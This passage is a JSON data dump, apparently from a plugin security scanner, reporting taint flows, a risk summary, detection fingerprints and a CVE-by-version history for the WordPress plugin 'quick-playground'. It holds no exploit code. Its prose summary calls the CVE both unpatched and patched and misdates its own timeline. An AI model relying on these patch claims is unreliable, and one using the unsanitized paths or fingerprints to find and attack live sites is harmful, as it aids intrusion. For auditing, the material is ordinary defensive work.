(expro-quickplayground-sync.php:0)",{"nodes":511,"edges":518},[512,513,514,515,516,517],{"id":353,"type":354,"label":493,"file":50,"line":494},{"id":359,"type":364,"label":375,"file":50,"line":496,"wp_function":377},{"id":363,"type":354,"label":475,"file":50,"line":498},{"id":368,"type":364,"label":424,"file":50,"line":500,"wp_function":426},{"id":371,"type":354,"label":475,"file":50,"line":498},{"id":374,"type":364,"label":365,"file":50,"line":503,"wp_function":366},[519,520,521],{"from":353,"to":359,"sanitized":429},{"from":363,"to":368,"sanitized":429},{"from":371,"to":374,"sanitized":429},{"entryPoint":523,"graph":524,"unsanitizedCount":11,"severity":430},"qckply_iframe (qckply-iframe.php:36)",{"nodes":525,"edges":534},[526,529,530,533],{"id":353,"type":354,"label":527,"file":235,"line":528},"$_SERVER['REQUEST_URI']",87,{"id":359,"type":364,"label":365,"file":235,"line":528,"wp_function":366},{"id":363,"type":354,"label":531,"file":235,"line":532},"$_GET (x2)",51,{"id":368,"type":364,"label":365,"file":235,"line":86,"wp_function":366},[535,536],{"from":353,"to":359,"sanitized":429},{"from":363,"to":368,"sanitized":429},{"entryPoint":538,"graph":539,"unsanitizedCount":11,"severity":430},"\u003Cqckply-iframe> (qckply-iframe.php:0)",{"nodes":540,"edges":545},[541,542,543,544],{"id":353,"type":354,"label":527,"file":235,"line":528},{"id":359,"type":364,"label":365,"file":235,"line":528,"wp_function":366},{"id":363,"type":354,"label":531,"file":235,"line":532},{"id":368,"type":364,"label":365,"file":235,"line":86,"wp_function":366},[546,547],{"from":353,"to":359,"sanitized":429},{"from":363,"to":368,"sanitized":429},{"entryPoint":549,"graph":550,"unsanitizedCount":11,"severity":430},"qckply_json_upload 
(qckply_upload.php:3)",{"nodes":551,"edges":555},[552,554],{"id":353,"type":354,"label":553,"file":299,"line":184},"$_FILES",{"id":359,"type":364,"label":365,"file":299,"line":450,"wp_function":366},[556],{"from":353,"to":359,"sanitized":429},{"entryPoint":558,"graph":559,"unsanitizedCount":11,"severity":430},"\u003Cqckply_upload> (qckply_upload.php:0)",{"nodes":560,"edges":563},[561,562],{"id":353,"type":354,"label":553,"file":299,"line":184},{"id":359,"type":364,"label":365,"file":299,"line":450,"wp_function":366},[564],{"from":353,"to":359,"sanitized":429},{"entryPoint":566,"graph":567,"unsanitizedCount":25,"severity":430},"qckply_main (quick-playground.php:43)",{"nodes":568,"edges":572},[569,570,571],{"id":353,"type":354,"label":355,"file":51,"line":74},{"id":359,"type":360,"label":361,"file":51,"line":74},{"id":363,"type":364,"label":365,"file":315,"line":316,"wp_function":366},[573,574],{"from":353,"to":359,"sanitized":53},{"from":359,"to":363,"sanitized":53},{"entryPoint":576,"graph":577,"unsanitizedCount":25,"severity":430},"\u003Cquick-playground> (quick-playground.php:0)",{"nodes":578,"edges":582},[579,580,581],{"id":353,"type":354,"label":355,"file":51,"line":74},{"id":359,"type":360,"label":361,"file":51,"line":74},{"id":363,"type":364,"label":365,"file":315,"line":316,"wp_function":366},[583,584],{"from":353,"to":359,"sanitized":53},{"from":359,"to":363,"sanitized":53},{"entryPoint":586,"graph":587,"unsanitizedCount":11,"severity":430},"qckply_clone_page 
(quickplayground_design_clone.php:6)",{"nodes":588,"edges":595},[589,590,592,594],{"id":353,"type":354,"label":355,"file":337,"line":335},{"id":359,"type":364,"label":365,"file":337,"line":591,"wp_function":366},33,{"id":363,"type":354,"label":593,"file":337,"line":228},"$_POST['target']",{"id":368,"type":364,"label":365,"file":337,"line":228,"wp_function":366},[596,597],{"from":353,"to":359,"sanitized":429},{"from":363,"to":368,"sanitized":429},{"entryPoint":599,"graph":600,"unsanitizedCount":11,"severity":430},"\u003Cquickplayground_design_clone> (quickplayground_design_clone.php:0)",{"nodes":601,"edges":606},[602,603,604,605],{"id":353,"type":354,"label":355,"file":337,"line":335},{"id":359,"type":364,"label":365,"file":337,"line":591,"wp_function":366},{"id":363,"type":354,"label":593,"file":337,"line":228},{"id":368,"type":364,"label":365,"file":337,"line":228,"wp_function":366},[607,608],{"from":353,"to":359,"sanitized":429},{"from":363,"to":368,"sanitized":429},{"summary":610,"deductions":611},"The 'quick-playground' plugin v1.3.2 exhibits a generally good security posture, with a strong emphasis on prepared SQL statements and proper output escaping, indicating developers are aware of common web vulnerabilities. The plugin also demonstrates robust use of nonce and capability checks for its identified entry points, minimizing direct exposure. However, the presence of the `move_uploaded_file` function is a significant concern. While not immediately flagged as a critical taint flow in this analysis, the potential for insecure file handling, especially if user-controlled data influences the destination path or filename, represents a notable risk vector.\n\nThe vulnerability history, specifically a past critical CVE related to Missing Authorization, is a significant red flag. While currently unpatched, this suggests a recurring weakness or a past incident that, if not thoroughly addressed and mitigated in subsequent versions, could resurface. 
The fact that the last vulnerability was recorded as being in the future (2026-04-08) is highly unusual and likely an artifact of the data provided; however, it still points to a past critical issue that needs careful consideration.\n\nIn conclusion, while 'quick-playground' has strengths in its defensive coding practices like prepared statements and output escaping, the `move_uploaded_file` function and the history of a critical Missing Authorization vulnerability warrant careful scrutiny and potential mitigation strategies to ensure the plugin's overall security.",[612,614,616],{"reason":613,"points":184},"Critical CVE in history, even if patched",{"reason":615,"points":181},"Dangerous function: move_uploaded_file",{"reason":617,"points":215},"Taint flows with unsanitized paths","2026-04-16T14:18:07.392Z",{"wat":620,"direct":628},{"assetPaths":621,"generatorPatterns":623,"scriptPaths":624,"versionParams":626},[622],"\u002Fwp-content\u002Fplugins\u002Fquick-playground\u002Fquick-playground.php",[],[625],"\u002Fwp-content\u002Fplugins\u002Fquick-playground\u002Fquick-playground.js",[627],"quick-playground\u002Fquick-playground.js?ver=",{"cssClasses":629,"htmlComments":636,"htmlAttributes":637,"restEndpoints":644,"jsGlobals":645,"shortcodeOutput":646},[630,631,632,633,634,635],"qckply-doc","qckply-form","qckply-theme-previews","qckply-stylesheet","qckply-theme-screenshot","qckply-theme-button",[],[638,639,640,641,642,643],"name=\"build_profile\"","name=\"playground\"","name=\"theme_blueprint[]\"","name=\"theme_name[]\"","name=\"settings[page_on_front]\"","name=\"settings[qckply_key_pages]\"",[],[],[],{"slug":4,"current_version":6,"total_versions":307,"versions":648},[649,654,662,670,678,686,694,702,710,718,726,734,741,749,757,765],{"version":6,"download_url":23,"svn_tag_url":650,"released_at":34,"has_diff":53,"diff_files_changed":651,"diff_lines":34,"trac_diff_url":652,"vulnerabilities":653,"is_current":429},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-pla
yground\u002Ftags\u002F1.3.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.3.1&new_path=%2Fquick-playground%2Ftags%2F1.3.2",[],{"version":655,"download_url":656,"svn_tag_url":657,"released_at":34,"has_diff":53,"diff_files_changed":658,"diff_lines":34,"trac_diff_url":659,"vulnerabilities":660,"is_current":53},"1.3.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.3.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.3.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.3&new_path=%2Fquick-playground%2Ftags%2F1.3.1",[661],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":663,"download_url":664,"svn_tag_url":665,"released_at":34,"has_diff":53,"diff_files_changed":666,"diff_lines":34,"trac_diff_url":667,"vulnerabilities":668,"is_current":53},"1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.2.1&new_path=%2Fquick-playground%2Ftags%2F1.3",[669],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":671,"download_url":672,"svn_tag_url":673,"released_at":34,"has_diff":53,"diff_files_changed":674,"diff_lines":34,"trac_diff_url":675,"vulnerabilities":676,"is_current":53},"1.2.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.2.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.2.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.2&new_path=%2Fquick-playground%2Ftags%2F1.2.1",[677],{"id":30,"url_s
lug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":679,"download_url":680,"svn_tag_url":681,"released_at":34,"has_diff":53,"diff_files_changed":682,"diff_lines":34,"trac_diff_url":683,"vulnerabilities":684,"is_current":53},"1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.1&new_path=%2Fquick-playground%2Ftags%2F1.2",[685],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":687,"download_url":688,"svn_tag_url":689,"released_at":34,"has_diff":53,"diff_files_changed":690,"diff_lines":34,"trac_diff_url":691,"vulnerabilities":692,"is_current":53},"1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.0.9&new_path=%2Fquick-playground%2Ftags%2F1.1",[693],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":695,"download_url":696,"svn_tag_url":697,"released_at":34,"has_diff":53,"diff_files_changed":698,"diff_lines":34,"trac_diff_url":699,"vulnerabilities":700,"is_current":53},"1.0.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.0.9.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.0.9\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.0.8&new_path=%2Fquick-playground%2Ftags%2F1.0.9",[701],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":703,"downlo
ad_url":704,"svn_tag_url":705,"released_at":34,"has_diff":53,"diff_files_changed":706,"diff_lines":34,"trac_diff_url":707,"vulnerabilities":708,"is_current":53},"1.0.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.0.8.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.0.8\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.0.7&new_path=%2Fquick-playground%2Ftags%2F1.0.8",[709],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":711,"download_url":712,"svn_tag_url":713,"released_at":34,"has_diff":53,"diff_files_changed":714,"diff_lines":34,"trac_diff_url":715,"vulnerabilities":716,"is_current":53},"1.0.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.0.7.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.0.7\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.0.6&new_path=%2Fquick-playground%2Ftags%2F1.0.7",[717],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":719,"download_url":720,"svn_tag_url":721,"released_at":34,"has_diff":53,"diff_files_changed":722,"diff_lines":34,"trac_diff_url":723,"vulnerabilities":724,"is_current":53},"1.0.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.0.6.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.0.6\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.0.5&new_path=%2Fquick-playground%2Ftags%2F1.0.6",[725],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":727,"download_url":728,"svn_tag_url":729,"released_at":34,"has_diff":53,"diff_files_changed":730,"diff_
lines":34,"trac_diff_url":731,"vulnerabilities":732,"is_current":53},"1.0.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.0.5.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.0.5\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.0.4&new_path=%2Fquick-playground%2Ftags%2F1.0.5",[733],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":98,"download_url":735,"svn_tag_url":736,"released_at":34,"has_diff":53,"diff_files_changed":737,"diff_lines":34,"trac_diff_url":738,"vulnerabilities":739,"is_current":53},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.0.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.0.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.0.3&new_path=%2Fquick-playground%2Ftags%2F1.0.4",[740],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":742,"download_url":743,"svn_tag_url":744,"released_at":34,"has_diff":53,"diff_files_changed":745,"diff_lines":34,"trac_diff_url":746,"vulnerabilities":747,"is_current":53},"1.0.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.0.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.0.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.0.2&new_path=%2Fquick-playground%2Ftags%2F1.0.3",[748],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":750,"download_url":751,"svn_tag_url":752,"released_at":34,"has_diff":53,"diff_files_changed":753,"diff_lines":34,"trac_diff_url":754,"vulnerabilities":755,"is_current":53},"1.0.2","https:\u002F\u002Fdownl
oads.wordpress.org\u002Fplugin\u002Fquick-playground.1.0.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.0.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.0.1&new_path=%2Fquick-playground%2Ftags%2F1.0.2",[756],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":758,"download_url":759,"svn_tag_url":760,"released_at":34,"has_diff":53,"diff_files_changed":761,"diff_lines":34,"trac_diff_url":762,"vulnerabilities":763,"is_current":53},"1.0.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.0.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.0.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fquick-playground%2Ftags%2F1.0&new_path=%2Fquick-playground%2Ftags%2F1.0.1",[764],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":766,"download_url":767,"svn_tag_url":768,"released_at":34,"has_diff":53,"diff_files_changed":769,"diff_lines":34,"trac_diff_url":34,"vulnerabilities":770,"is_current":53},"1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fquick-playground\u002Ftags\u002F1.0\u002F",[],[771],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6}]